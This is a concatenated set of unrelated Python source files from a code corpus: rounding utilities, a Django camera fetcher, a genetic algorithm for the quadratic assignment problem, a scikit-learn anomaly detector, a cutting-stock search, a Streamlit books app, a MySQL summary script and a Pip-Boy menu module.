#      1.5         1 or 2
#      1.6         2
#      0.0         0
#     -0.7        -1
#     -1.1        -1
#     -1.6        -2
#
#  Licensing:
#
#    This code is distributed under the GNU LGPL license.
#
#  Modified:
#
#    25 July 2014
#
#  Author:
#
#    John Burkardt
#
#  Parameters:
#
#    Input, real X, the value.
#
#    Output, integer VALUE, the nearest integer to X.
#
  if ( x < 0.0 ):
    s = -1
  else:
    s = 1
#
#  int() truncates toward zero, so int(abs(x) + 0.5) rounds |x| to the
#  nearest integer as the examples above require.  The previous code used
#  round(abs(x) + 0.5), which rounds the *shifted* value: round(1.3 + 0.5)
#  is 2, so 1.3 was wrongly mapped to 2 instead of 1.
#
  value = s * int ( abs ( x ) + 0.5 )

  return value
def r8_nint_test ( ):

#*****************************************************************************80
#
## R8_NINT_TEST tests R8_NINT
#
#  Licensing:
#
#    This code is distributed under the GNU LGPL license.
#
#  Modified:
#
#    26 July 2014
#
#  Author:
#
#    John Burkardt
#
  import platform
#
#  r8_uniform_ab is a sibling module of this project; it returns a pair
#  (value, updated_seed).
#
  from r8_uniform_ab import r8_uniform_ab

  seed = 123456789
  test_num = 10

  print ( '' )
  print ( 'R8_NINT_TEST' )
  print ( '  Python version: %s' % ( platform.python_version ( ) ) )
  print ( '  R8_NINT produces the nearest integer.' )
  print ( '' )
  print ( '      X      R8_NINT(X)' )
  print ( '' )
#
#  Sample uniformly from [-10, +10] and print each value with its rounding.
#
  b = -10.0
  c = +10.0

  for test in range ( 0, test_num ):
    x, seed = r8_uniform_ab ( b, c, seed )
    print ( '  %10f  %6d' % ( x, r8_nint ( x ) ) )
#
#  Terminate.
#
  print ( '' )
  print ( 'R8_NINT_TEST' )
  print ( '  Normal end of execution.' )
  return
if ( __name__ == '__main__' ):
  # timestamp is a sibling project module; it brackets the test run with
  # wall-clock timestamps.
  from timestamp import timestamp
  timestamp ( )
  r8_nint_test ( )
  timestamp ( )
| true |
95e2d22b88f4dbd4d10bf498bf5697d79d4a200e | Python | nikolaik/p2coffee | /p2coffee/utils.py | UTF-8 | 1,217 | 2.515625 | 3 | [] | no_license | import logging
import io
import requests
from django.conf import settings
from django.utils.timezone import is_naive, get_current_timezone_name, pytz, is_aware, localtime
from requests.exceptions import ConnectionError
logger = logging.getLogger(__name__)
def format_local_timestamp(dt, dt_format='%Y-%m-%d %H:%M'):
    """Format *dt* in the currently active timezone.

    A naive datetime is assumed to already be in the current timezone and is
    localized to it; an aware datetime is converted to local time first.

    :param dt: A datetime object
    :param dt_format: Format string passed to strftime
    """
    if is_naive(dt):
        current_tz = pytz.timezone(get_current_timezone_name())
        localized = current_tz.localize(dt)
    elif is_aware(dt):
        localized = localtime(dt)
    else:
        localized = dt
    return localized.strftime(dt_format)
def coffee_image():
    """Fetch a snapshot from the coffee camera using basic auth.

    Returns an io.BytesIO holding the image bytes, or None on a non-200
    response or a connection failure (both are logged).
    """
    url = settings.COFFEE_CAMERA_URL
    auth = (settings.COFFEE_CAMERA_USER, settings.COFFEE_CAMERA_PASS)
    try:
        response = requests.get(url, auth=auth)
        if response.status_code == 200:
            logger.debug("Got image with %d bytes", len(response.content))
            return io.BytesIO(response.content)
        logger.error("Couldn't get camera image: %s", str(response.content))
    except ConnectionError as e:
        logger.error("Couldn't get camera image: %s", str(e))
    return None
| true |
e38f9f6f08cca76a762882cb4bb30cf4d99dc65c | Python | AlfonsBC/competitive_programming | /codeforces/soldier_and_bananas.PY | UTF-8 | 118 | 2.765625 | 3 | [] | no_license | k,n,w = map(int, input().split())
result = (k *int((w+1)*w / 2))- n
if result>0:
print(result)
else:
print(0) | true |
e3f0f6994fbd7b73d3f107b3dbadf8d8426c0583 | Python | JanStoltman/100DaysOfCode | /Python/Genetic algorithms/Lab1/Algorithm.py | UTF-8 | 4,689 | 2.90625 | 3 | [
"MIT"
] | permissive | import random
import copy
import sys
from Lab1.Creature import Creature
from Lab1.Writer import write
class Algorithm:
    """Genetic algorithm for the Quadratic Assignment Problem (QAP).

    Individuals are Creature objects whose .matrix maps locations to
    facilities and whose .eval holds the fitness (lower is better).
    """
    def __init__(self, flow, dist, pop_size, init_pop, generations, pm, px, tour, selection_type, crossover_size):
        # flow/dist: QAP flow and distance matrices.
        # pm / px: mutation and crossover probabilities.
        # tour: tournament size; selection_type: 'r' roulette or 't' tournament.
        # crossover_size: number of parents kept by selection.
        self.population = init_pop
        self.flow = flow
        self.dist = dist
        self.pop_size = pop_size
        self.generations = generations
        self.pm = pm
        self.px = px
        self.tour = tour
        self.selection_type = selection_type
        self.crossover_size = crossover_size
        # NOTE(review): assumes a fresh Creature() carries a comparable
        # .eval sentinel (worst fitness) -- confirm in Lab1.Creature.
        self.best = Creature()
        self.worst = 0
    def run(self):
        """Evolve the population for the configured number of generations."""
        for generation in range(0, self.generations):
            # Eval all curent gen
            for creature in self.population:
                self.assess_fitness(creature)
                if creature.eval < self.best.eval:
                    self.best = copy.deepcopy(creature)
                if creature.eval > self.worst:
                    self.worst = creature.eval
            # self.print_fittest()
            self.selection()
            self.crossover()
            self.mutation()
    def print_fittest(self):
        """Debug helper: print the current best creature's fitness and layout."""
        c = min(self.population, key=lambda x: x.eval)
        print(c.eval)
        print(c.matrix)
    def selection(self):
        """Dispatch to the configured selection operator."""
        if self.selection_type == 'r':
            self.roulette()
        elif self.selection_type == 't':
            self.tournament()
        else:
            raise ValueError("Selection type not supported: " + self.selection_type)
    def roulette(self):
        """Fitness-proportionate selection (minimisation variant).

        Each pick weights individuals by (mx - eval), so lower-eval
        creatures get larger slices of the wheel.
        """
        tmp_pop = []
        s = sum(map(lambda x: x.eval, self.population))
        mi = min(self.population, key=lambda x: x.eval).eval
        mx = max(self.population, key=lambda x: x.eval).eval + mi
        for _ in range(0, self.crossover_size):
            r = random.randint(0, s)
            i = random.randint(0, len(self.population) - 1)
            # Walk the wheel from a random start until the remaining
            # distance s - r is consumed.
            while r < s:
                r += (mx - self.population[i].eval)
                i += 1
                if i >= len(self.population):
                    i = 0
            tmp_pop.append(self.population[i])
        self.population = tmp_pop
    def tournament(self):
        """Pick crossover_size winners, each the best of a random tour-sized sample."""
        tmp_pop = []
        for _ in range(0, self.crossover_size):
            random.shuffle(self.population)
            tmp = self.population[0:self.tour]
            tmp_pop.append(min(tmp, key=lambda x: x.eval))
        self.population.clear()
        self.population.extend(tmp_pop)
    def crossover(self):
        """Refill the population to pop_size by breeding random parent pairs
        with probability px per attempt."""
        tmp_pop = []
        while len(self.population) + len(tmp_pop) < self.pop_size:
            random.shuffle(self.population)
            i = random.uniform(0, 1)
            if i < self.px:
                tmp_pop.append(self.breed(self.population[0], self.population[1]))
        self.population.extend(tmp_pop)
    def breed(self, mother, father):
        """Produce one child via PMX (the second PMX child is discarded)."""
        c1, c2 = self.pmx(mother, father)
        return c1
    def simple(self, mother, father):
        """Alternative one-point crossover (unused by breed())."""
        c = Creature()
        l = len(mother.matrix)
        hl = int(l / 2)
        c.set_matrix(mother.matrix[0:hl], father.matrix[hl:l])
        return c
    def pmx(self, mother, father):
        """Partially-mapped crossover: swap a random segment of facility
        assignments while repairing duplicates via the position maps p1/p2."""
        c1 = copy.deepcopy(mother)
        c2 = copy.deepcopy(father)
        size = len(c1.matrix)
        # p1[f] / p2[f]: index at which facility f sits in c1 / c2.
        p1, p2 = [0] * size, [0] * size
        for i in range(0, size):
            p1[c1.matrix[i][1]] = i
            p2[c2.matrix[i][1]] = i
        cxpoint1 = random.randint(0, size)
        cxpoint2 = random.randint(0, size - 1)
        if cxpoint2 >= cxpoint1:
            cxpoint2 += 1
        else:
            cxpoint1, cxpoint2 = cxpoint2, cxpoint1
        for i in range(cxpoint1, cxpoint2):
            temp1 = c1.matrix[i][1]
            temp2 = c2.matrix[i][1]
            # Swap the crossed-over facility with its duplicate elsewhere.
            c1.matrix[i][1], c1.matrix[p1[temp2]][1] = temp2, temp1
            c2.matrix[i][1], c2.matrix[p1[temp2]][1] = temp1, temp2
            p1[temp1], p1[temp2] = p1[temp2], p1[temp1]
            p2[temp1], p2[temp2] = p2[temp2], p2[temp1]
        return c1, c2
    def assess_fitness(self, creature):
        """Compute the QAP cost of *creature* and store it in creature.eval.

        Sums flow * distance over all location pairs in both directions.
        """
        creature.check_fabs()
        result = 0
        for i in range(0, len(creature.matrix)):
            for j in range(i, len(creature.matrix)):
                val = creature.matrix[i]
                val2 = creature.matrix[j]
                d = self.dist[val[0]][val2[0]]
                f = self.flow[val[1]][val2[1]]
                ds = self.dist[val2[0]][val[0]]
                fs = self.flow[val2[1]][val[1]]
                result += f * d + fs * ds
        creature.eval = result
    def mutation(self):
        """Mutate each creature in place with probability pm."""
        for c in self.population:
            i = random.uniform(0, 1)
            if i < self.pm:
                c.mutate()
| true |
ddb44e4e40e309b981a01d63a5379d21b7934142 | Python | jjaramillom/sklearnflask | /Anomalies_Detector.py | UTF-8 | 6,426 | 2.8125 | 3 | [
"MIT"
] | permissive | # -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
import pandas as pd
import numpy as np
from sklearn.ensemble import RandomForestRegressor
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import Ridge
from sklearn.linear_model import Lasso
from sklearn.neighbors import KNeighborsRegressor
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
class AnomalyDetector:
    """Train a regressor on a time series and flag points where the model's
    prediction diverges from the target's EWMA by more than a threshold."""
    def __init__(self, train_df: pd.DataFrame, target: str, timeVar: str, predictors: list, pastTargetasPredictor: bool = False, model: str = 'RandomForest'):
        # target/timeVar: column names; pastTargetasPredictor adds a lagged
        # copy of the target as a feature.  model: 'RandomForest',
        # 'KNeighbors' or 'Lasso' (see trainModel).
        self.TARGETVAR = target
        self.TIMEVAR = timeVar
        self.PASTVAR = pastTargetasPredictor
        self.MODELNAME = model
        self.TRAIN_DF = self._preprocess(train_df)
    def _get_x_y(self, dataFrame):
        """Split a frame into features X and target series y."""
        y = dataFrame[self.TARGETVAR]
        return dataFrame.drop(self.TARGETVAR, axis = 1), y
    def _addPreviousTarget(self, dataFrame):
        """Append a one-step-lagged copy of the target as a new column."""
        Shiftedvar = str('previous ') + self.TARGETVAR
        dataFrame[Shiftedvar] = dataFrame[self.TARGETVAR].shift()
        return dataFrame
    def _fillNA(self, dataFrame):
        # Forward-fill first, then back-fill to cover leading NaNs (in place).
        dataFrame.fillna(method = 'ffill', inplace = True)
        dataFrame.fillna(method = 'bfill', inplace = True)
    def _preprocess(self, dataFrame):
        """Drop the time column, optionally add the lagged target, coerce to
        numeric and fill gaps.  NOTE(review): mutates the caller's frame
        (inplace drop) -- confirm callers do not rely on the original."""
        dataFrame.drop(self.TIMEVAR, axis = 1, inplace = True)
        if (self.PASTVAR):
            dataFrame = self._addPreviousTarget(dataFrame)
        dataFrame = dataFrame.apply(pd.to_numeric)
        self._fillNA(dataFrame)
        return dataFrame
    def predict(self, dataFrame: pd.DataFrame):
        """Score a new frame and build self.predictions with columns
        Timestamp, Target, TargetEWMA, <model name> and Alarm (1 when the
        model deviates from the EWMA by more than 5)."""
        self.ewmaAlpha = 0.4
        self.TIMESTAMP = pd.to_datetime(dataFrame[self.TIMEVAR], infer_datetime_format=True)
        dataFrame = self._preprocess(dataFrame)
        X, y = self._get_x_y(dataFrame)
        columns = ['Timestamp','Target', 'TargetEWMA']
        columns.append(self.MODELNAME)
        self.predictions = pd.DataFrame(columns = columns)
        self.predictions['Timestamp'] = self.TIMESTAMP
        self.predictions['Target'] = y
        self.predictions['TargetEWMA'] = y.ewm(alpha = self.ewmaAlpha).mean()
        self.predictions[self.MODELNAME] = self.model.predict(X)
        # Fixed deviation threshold of 5 (same units as the target).
        self.predictions['Alarm'] = self.predictions.apply(lambda row: 1 if np.abs(row[self.MODELNAME] - row['TargetEWMA']) > 5 else 0, axis = 1)
        # NOTE(review): 'predictions' aliases self.predictions, so this
        # stringification also mutates the stored frame -- confirm intended.
        predictions = self.predictions
        predictions['Timestamp'] = predictions['Timestamp'].astype(str)
        return self.predictions
    def _fit(self, X, y):
        """Fit self.model on a 70/30 split; return rounded R^2 scores."""
        X_train, X_test, y_train, y_test = train_test_split(X,y, test_size = 0.3) #random_state = 5,
        self.model.fit(X_train, y_train)
        score = {'training': np.around(self.model.score(X_train, y_train), decimals=3), 'test': np.around(self.model.score(X_test, y_test), decimals = 3)}
        return score
    def trainModel(self, parameters: dict = {'RandomForest': {'trees': 20, 'max_depth': 10}, 'KNeighbors': {'n_neighbors': 20}, 'Lasso': {'alpha': 2.5}}):
        """Instantiate the configured estimator, fit it, and return
        (model, score).  Only the sub-dict matching self.MODELNAME is used."""
        X, y = self._get_x_y(self.TRAIN_DF)
        self.predictors = X.columns
        if self.MODELNAME == 'RandomForest':
            self.model = (RandomForestRegressor(n_jobs = -1, n_estimators = parameters['RandomForest']['trees'], max_depth = parameters['RandomForest']['max_depth']))
        elif self.MODELNAME == 'KNeighbors':
            self.model = (KNeighborsRegressor(n_jobs = -1, n_neighbors = parameters['KNeighbors']['n_neighbors']))
        elif self.MODELNAME == 'Lasso':
            self.model = (Lasso(alpha = parameters['Lasso']['alpha']))
        self.score = self._fit(X, y)
        return self.model, self.score
    def feature_importances(self):
        """Return a sorted importance table (Random Forest only)."""
        if self.MODELNAME == 'RandomForest':
            return pd.DataFrame(self.model.feature_importances_, index = self.predictors, columns=['importance']).sort_values('importance', ascending=False)
        return 'ERROR. This function is only valid for Random Forest models. Please create ones'
    def plot(self, start: int = 0, end: int = 0, title: str = 'Predictions', fileName: str = 'plot.png', dpi: int = 200, size: list = [12,5]):
        """Plot predictions[start:end] and save to *fileName*.

        NOTE(review): `size` is a mutable default and is mutated below
        (`size[1] *= ...`), so repeated calls with the default grow the
        figure height each time -- should copy the list or default to None.
        """
        if end == 0:
            end = self.predictions.index.size
        labels = ['Target', 'Target EWMA ' + r'$\alpha=$' + str(self.ewmaAlpha)]
        labels.append(self.MODELNAME + r' $R^2 = $ {0:.3f}'.format(self.score['test']))
        toPlot = [self.predictions.drop('Timestamp', axis = 1), labels]
        size[1] *= (len(labels) - 2)
        self.plotSeries(toPlot, self.TIMESTAMP, start, end, title, fileName, size)
    def plotSeries(self, data, ticks, start, stop, title, fileName, size):
        """Render one subplot per model column (columns after Target and
        TargetEWMA), shading where the EWMA exceeds the model by > dif."""
        numberOfTicks = 15
        toCompare = 'TargetEWMA' ##Target
        filteredData = data[0].iloc[start:stop]
        step = int(np.ceil((stop - start)/numberOfTicks))
        x = np.arange(filteredData.index.size)
        ax = plt.gca()
        fig = plt.gcf()
        fig.set_size_inches(size[0], size[1])
        fig.suptitle(title, fontsize=16)
        ax.spines['top'].set_visible(False)
        ax.spines['right'].set_visible(False)
        ax.grid(True)
        i = 0
        my_xticks = ticks[start:stop:step]
        columns = filteredData.columns.values
        lastCol = columns.size - 1
        dif = 5
        for column in filteredData:
            # Skip the first two columns (Target and TargetEWMA themselves).
            if(i > 1):
                ax = plt.subplot(len(data[1]) - 2, 1, i-1)
                plt.ylim([35,80])
                if (i != lastCol):
                    plt.xticks(np.arange(0, filteredData.index.size, step))
                    plt.setp(ax.get_xticklabels(), visible = False)
                else:
                    # Only the bottom subplot shows the timestamp labels.
                    plt.xticks(np.arange(0, filteredData.index.size, step), my_xticks, rotation=80)
                # dif = np.std(filteredData[toCompare])
                plt.plot(x, filteredData[toCompare], label = data[1][1], c = 'lime')
                plt.plot(x, filteredData[column], label = data[1][i], c = 'chocolate')
                ax.fill_between(x, filteredData[toCompare], filteredData[column],
                                where=filteredData[toCompare] - filteredData[column] > dif,
                                facecolor= 'wheat', interpolate=True) #(0.18,0.38,0.6,0.65)
                plt.legend()
            i += 1
        plt.tight_layout(rect = (0,0,1,0.96))
        plt.savefig(fileName, dpi=200)
        plt.show()
| true |
c0a606edad70d2a63b8015a8eb56c9b2777ce13d | Python | leGIT-bot/CS-pattern-reduction | /ReturnSeeds.py | UTF-8 | 4,595 | 2.953125 | 3 | [] | no_license | import random
def GenerateDynamicTable(sizes, stripSize):
    """Build the backtracking table for the cutting-stock search.

    Each entry i describes partial solutions that fill exactly i units:
    currentSolution (sizes used), remainingSizes (still usable), and
    previousSolutions (all solutions already seen at i).  ReturnChild()
    drives the search to fill the table.
    """
    DynamicTable = [0]*(stripSize + 1)
    for i in range(0, stripSize + 1):
        DynamicTable[i] = {'currentSolution':[], 'remainingSizes':[], 'previousSolutions':[]}
    DynamicTable[0]['remainingSizes'] = DetermineAvailableSizes(stripSize, sizes)
    ReturnChild(DynamicTable)
    #for i in range(0, stripSize + 1):
    #    if len(DynamicTable[i]['remainingSizes']) > 0:
    #        size = DynamicTable[i]['remainingSizes'].pop()
    #        DynamicTable[i + size]['previousSolutions'].append(DynamicTable[i]['currentSolution'] + [size])
    #        DynamicTable[i + size]['currentSolution'] = DynamicTable[i]['currentSolution'] + [size]
    #        DynamicTable[i + size]['remainingSizes'] = DetermineAvailableSizes(stripSize - i - size, DynamicTable[i]['remainingSizes'])
    #
    #if DynamicTable[stripSize]['currentSolution'] == []:
    #    DynamicTable[stripSize]['currentSolution'] = None
    return DynamicTable
def DetermineAvailableSizes(spaceLeft, sizes):
    """Return the sizes from *sizes* that still fit in *spaceLeft*.

    *sizes* may be a list of sizes or a {size: count} mapping; a mapping
    contributes each fitting size *count* times.
    """
    if isinstance(sizes, list):
        return [size for size in sizes if size <= spaceLeft]
    return [size
            for size, count in sizes.items()
            if size <= spaceLeft
            for _ in range(count)]
def ReturnChild(DynamicTable):
    """Advance the backtracking search to the next full-strip solution.

    Returns the solution that was stored at the last table entry *before*
    this call.  Walks the table backwards ('backtracking') looking for an
    entry with untried sizes, then forwards again extending the current
    partial solution; sets currentSolution to None when the search space
    is exhausted.
    """
    TableLength = len(DynamicTable) - 1
    returnSolution = DynamicTable[TableLength]['currentSolution']
    NewSolutionFound = False
    backtracking = True
    CurrentPosition = TableLength - 1
    while NewSolutionFound == False:
        if backtracking:
            # Scan backwards for an entry that still has an untried size.
            if len(DynamicTable[CurrentPosition]['remainingSizes']) > 0:
                size = DynamicTable[CurrentPosition]['remainingSizes'].pop()
                newSolution = DynamicTable[CurrentPosition]['currentSolution'] + [size]
                # Only step forward if this extension was not seen before.
                if CheckRepeatSolution(newSolution, DynamicTable[CurrentPosition + size]['previousSolutions']):
                    DynamicTable[CurrentPosition + size]['previousSolutions'].append(newSolution)
                    DynamicTable[CurrentPosition + size]['currentSolution'] = newSolution
                    DynamicTable[CurrentPosition + size]['remainingSizes'] = DetermineAvailableSizes(TableLength - CurrentPosition - size, DynamicTable[CurrentPosition]['remainingSizes'])
                    backtracking = False
                    CurrentPosition = CurrentPosition + size
            else:
                CurrentPosition = CurrentPosition - 1
        else:
            # Forward phase: extend until the strip is exactly filled.
            if CurrentPosition == TableLength:
                #print(DynamicTable[TableLength]['previousSolutions'])
                NewSolutionFound = True
            else:
                if len(DynamicTable[CurrentPosition]['remainingSizes']) > 0:
                    size = DynamicTable[CurrentPosition]['remainingSizes'].pop()
                    newSolution = DynamicTable[CurrentPosition]['currentSolution'] + [size]
                    if CheckRepeatSolution(newSolution, DynamicTable[CurrentPosition + size]['previousSolutions']):
                        DynamicTable[CurrentPosition + size]['previousSolutions'].append(newSolution)
                        DynamicTable[CurrentPosition + size]['currentSolution'] = DynamicTable[CurrentPosition]['currentSolution'] + [size]
                        DynamicTable[CurrentPosition + size]['remainingSizes'] = DetermineAvailableSizes(TableLength - CurrentPosition - size, DynamicTable[CurrentPosition]['remainingSizes'])
                        CurrentPosition = CurrentPosition + size
                else:
                    # Dead end: resume scanning backwards from one step left.
                    backtracking = True
                    CurrentPosition = CurrentPosition - 1
        # Fell off the left edge: no more solutions exist.
        if CurrentPosition < 0:
            NewSolutionFound = True
            DynamicTable[TableLength]['currentSolution'] = None
    return returnSolution
def CheckRepeatSolution(newSolution, Solutions):
    """Return True when *newSolution* is NOT already present in *Solutions*.

    List equality replaces the original hand-rolled element-by-element
    comparison, which also raised IndexError on empty solutions (it indexed
    solution[0] before checking the length).
    """
    return newSolution not in Solutions
#print(DynamicCuttingStock([3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 4, 4, 4, 4, 4, 4, 4, 4, 5, 5, 5, 5, 5, 5], 10))
#print(DynamicCuttingStock({138:22, 152:25, 156:12, 171:14, 182:18, 188:18, 193:20, 200:10, 205:12, 210:14, 214:16, 215:18, 220:20}, 560)) | true |
cce1db3627e0587301ca6292f72f144777a42384 | Python | kani91/ds-sample | /app.py | UTF-8 | 1,485 | 3 | 3 | [] | no_license | import streamlit as st
import sqlite3
import pandas as pd
st.title('best selling books')

conn = sqlite3.connect('Nyt.db')
cursor = conn.cursor()

st.header('select dates')
st.slider('slider')


def all_title():
    """Return the distinct best-seller titles joined with their Google Books rows.

    NOTE(review): the original file was missing this `def` line, leaving a
    bare `return` at module level (a SyntaxError).
    """
    titles = pd.read_sql("""Select distinct g.title from google_data g join NYT_BS_2009to2019 nyt on g.isbn=nyt.primary_isbn13 order by g.title""", conn).to_dict('records')
    books = titles
    return books


books = all_title()
st.write(books[0])
st.multiselect('pick a title', books)

# getting the scatter plot
# 1. define sql: per-book aggregates (peak rank, weeks on list, ratings)
record_scatter = pd.read_sql("""Select
primary_isbn13, g.title,author,categories,
min(rank),
count(distinct date),
g.ratingsCount,averageRating
FROM NYT_BS_2009to2019 nyt
join google_data g
on g.isbn=nyt.primary_isbn13
group by primary_isbn13, g.title,author,categories""", conn).to_dict('records')
# (table name fixed from 'g_data' to 'google_data' to match the query above)

# 2. get lists
ranks = [record['min(rank)'] for record in record_scatter]
length = [record['count(distinct date)'] for record in record_scatter]
title = [record['title'] for record in record_scatter]
author = [record['author'] for record in record_scatter]
categories = [record['categories'] for record in record_scatter]

# 3. create plot (px was used but never imported in the original)
import plotly.express as px
fig = px.scatter(x=ranks, y=length, hover_data=[title, author, categories])
fig.show()
fig.show() | true |
f86bb4718c77647b769e2d3018a39979f6d8577e | Python | Wang-ZhengYi/CMB-lensing | /dif_matrix.py | UTF-8 | 1,051 | 2.734375 | 3 | [] | no_license | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
Created on Apr 2019
@author: ZYW @ BNU
'''
#creat a matrix of derivation of 5 points
import numpy as np
import matplotlib.pyplot as plt
# Number of pixels per map side.
lens_sides = 256
#field degree (has to be a squared field)
field_deg = 20.0
#lensing amplitude magnification factor
#factor of scales
ipn = 5
#number of interpolation (stencil) points
h_0 = field_deg/lens_sides
#step-size of derivative
def g(k):
if k in range(lens_sides):
return k
elif k in range(lens_sides,lens_sides+ipn):
return k-lens_sides
elif k in range(-1*ipn,0):
return k+lens_sides
# g() above provides the periodic (cyclic-boundary) index function used here.
# Build the 5-point central-difference operator: di_e holds the stencil
# numerator coefficients applied at offsets -2..+2 of each row.
# NOTE(review): the standard 4th-order stencil is (1, -8, 0, 8, -1)/12h;
# the outer signs here are (-1, ..., 1) -- confirm the intended convention.
di = np.zeros(shape=(lens_sides,lens_sides),dtype='float')
di_e = [-1.,-8.,0.,8.,1.]
# (the dead `di_e = np.zeros(shape=(1, ipn))` pre-allocation was removed;
# it was immediately overwritten by the coefficient list above)
#generating vector of derivation matrix
for i in range(lens_sides):
    for j in range(ipn):
        di[i,g(i-2+j)] = di_e[j]
dif=di/12.0/h_0
#Assign value to derivation matrix
np.savetxt('diff_matirx.dat', dif)  # NOTE(review): filename typo "matirx" kept for compatibility
#saving derivation matrix
exit()
cb742b0364583484fd8d48279ee48fc74a328f9d | Python | kbutler52/ahmed_kayyali | /nest_loop.py | UTF-8 | 75 | 3.046875 | 3 | [] | no_license | a=0
# Print a fixed greeting five times.
count = 0
while count < 5:
    print('Hello')
    count = count + 1
| true |
f93a7bb2d6c279114a5a92b870e14a992ba18229 | Python | jiangyihong/PythonTutorials | /chapter9/animal.py | UTF-8 | 463 | 3.484375 | 3 | [] | no_license | class Animal(object):
    def __init__(self):
        # No state to initialise; present so subclasses can call super().__init__().
        pass
    def bark(self):
        """Print the generic Animal bark message (overridden by subclasses)."""
        print("Animal is barking!")
class Dog(Animal):
    """Animal subclass that barks with a dog-specific message."""
    def __init__(self):
        # Nothing dog-specific to set up; delegate to the base class.
        super().__init__()
    def bark(self):
        """Print the dog bark message (overrides Animal.bark)."""
        message = "Dog is barking!"
        print(message)
class Cat(Animal):
    """Animal subclass that barks with a cat-specific message."""
    def __init__(self):
        # Nothing cat-specific to set up; delegate to the base class.
        super().__init__()
    def bark(self):
        """Print the cat bark message (overrides Animal.bark)."""
        message = "Cat is barking!"
        print(message)
# Exercise each class: construct one of each and make it bark, in the
# same order as before (Animal, Dog, Cat).
animal = Animal()
my_dog = Dog()
my_cat = Cat()
for creature in (animal, my_dog, my_cat):
    creature.bark()
| true |
782f17790af452f1f2e6cf49fb85df1cc6353df0 | Python | jiadaizhao/LeetCode | /1301-1400/1392-Longest Happy Prefix/1392-Longest Happy Prefix.py | UTF-8 | 373 | 2.96875 | 3 | [
"MIT"
] | permissive | class Solution:
def longestPrefix(self, s: str) -> str:
lps = [0] * len(s)
l = 0
i = 1
while i < len(s):
if s[i] == s[l]:
lps[i] = l + 1
i += 1
l += 1
elif l != 0:
l = lps[l - 1]
else:
i += 1
return s[0: lps[-1]]
| true |
8c77a2831e7efb0837f39e81fd8d8d6f246679aa | Python | addonrizky/job_daily_summary_emiten | /summarize.py | UTF-8 | 2,247 | 2.875 | 3 | [] | no_license | import mysql.connector
from mysql.connector import Error

# Parameterized UPDATE template: placeholders instead of string-concatenated
# values (SQL-injection safe, and no manual quoting of numeric values).
UPDATE_SQL = ("UPDATE list_saham SET netval_1day_ago=%s, netval_2day_ago=%s, "
              "netval_3day_ago=%s, netval_4day_ago=%s, netval_5day_ago=%s, "
              "foreign_netval_1dago=%s, foreign_netval_2dago=%s, "
              "foreign_netval_3dago=%s, foreign_netval_4dago=%s, "
              "foreign_netval_5dago=%s, foreign_netval_total=%s "
              "WHERE kode_saham=%s")

connection = None
try:
    # NOTE(review): hard-coded credentials; move them to config/environment.
    connection = mysql.connector.connect(host='localhost',
                                         database='saham',
                                         user='root',
                                         password='Jakarta123!')
    sql_select_Query = "select * from list_saham"
    cursor = connection.cursor()
    cursor.execute(sql_select_Query)
    records = cursor.fetchall()
    print("Total number of rows in saham is: ", cursor.rowcount)

    print("\nPrinting each laptop record")
    for row in records:
        # Column layout assumed from the list_saham schema -- TODO confirm:
        # 1 = kode_saham, 16/20..23 = net values 1..5 days ago,
        # 31..35 = foreign net values 1..5 days ago.
        kode_saham = row[1] + ""
        netvals = [str(row[16]), str(row[20]), str(row[21]), str(row[22]), str(row[23])]
        foreign_netvals = [str(row[31]), str(row[32]), str(row[33]), str(row[34]), str(row[35])]
        foreign_netval_total = sum(float(v) for v in foreign_netvals)

        print("Id = ", row[0], )
        print("Kode Saham = ", row[1])
        print("Nama Saham = ", row[2])

        params = netvals + foreign_netvals + [str(foreign_netval_total), kode_saham]
        print(UPDATE_SQL)
        cursor.execute(UPDATE_SQL, params)
        connection.commit()

except Error as e:
    print("Error reading data from MySQL table", e)

finally:
    # Guard against `connection` being unset when connect() itself failed,
    # and close the cursor before its connection (the original closed the
    # connection first and could raise NameError on a failed connect).
    if connection is not None and connection.is_connected():
        cursor.close()
        connection.close()
        print("MySQL connection is closed")
8050f17ec4445b27da7c3947c2c76ff9c4b977bf | Python | simbi0nts/pipboy_software | /pypboy/modules/data/misc.py | UTF-8 | 4,697 | 2.625 | 3 | [] | no_license | import pypboy
import pygame
import config
import game
import random
from pypboy.modules.data import entities
class Module(pypboy.SubModule):
    """'Misc' data tab: a left-hand menu of personal notes and a right-hand
    panel (``self.notes``) that renders the selected note's text onto a
    background image."""
    label = "Misc"
    def __init__(self, *args, **kwargs):
        """Build the notes display surface and the menu that selects notes.

        Menu entries are padded to 22 characters so the highlight bar has
        a uniform width; each entry maps to one of the Note1..Note8
        callbacks below.
        """
        super(Module, self).__init__(*args, **kwargs)
        self.notes = Notes()
        self.notes.image = pygame.image.load('images/Quests/1.bmp')
        self.notes.rect[0] = 240
        self.notes.rect[1] = 50
        self.add(self.notes)
        self.menu = pypboy.ui.Menu(240, ['{: <22}'.format("Favourite Movies"),
                                         '{: <22}'.format("Favourite TV Series"),
                                         '{: <22}'.format("Favourite Books"),
                                         '{: <22}'.format("Favourite Games"),
                                         '{: <22}'.format("Favourite Music Genres"),
                                         '{: <22}'.format("Favourite Dish"),
                                         '{: <22}'.format("Favourite Colour"),
                                         '{: <22}'.format("About Me")], [self.Note1, self.Note2, self.Note3, self.Note4, self.Note5, self.Note6, self.Note7, self.Note8], 0)
        self.menu.rect[0] = 18
        self.menu.rect[1] = 50
        self.add(self.menu)
    # Note1..Note8 are the menu callbacks: each hands a "\n"-separated
    # bullet list to construct() for rendering.
    def Note1(self):
        """Render the 'Favourite TV Series' note."""
        self.construct(text_arr="o Fringe \no Shameless \no Fullmetal Alchemist \no "
                                "Cowboy Bebop \no Steins;Gate \no Firefly \no "
                                "Breaking Bad \no Doctor Who \no Arrested Development \no "
                                "Rick And Morty \no Daredevil \no Gotham")
    def Note2(self):
        """Render the 'Favourite Movies' note."""
        self.construct(text_arr="o Back To The Future Trilogy \no Clerks \no Bad Santa \no "
                                "Bridge To Terabithia \no The Butterfly Effect \no The Game \no "
                                "Mr. Nobody \no Hot Fuzz \no Big Nothing \no "
                                "Shaun Of The Dead \no The Terminal \no Filth")
    def Note3(self):
        """Render the 'Favourite Books' note."""
        self.construct(text_arr="o The Martian (Andy Weir) \no The Godfather (Mario Puzo) \no The Master And Margarita (Mikhail Bulgakov) \no "
                                "Los Piratas Del Golfo (Vicente Riva Palacio) \no The End Of Eternity (Isaac Asimov) \no I, Robot (Isaac Asimov) \no "
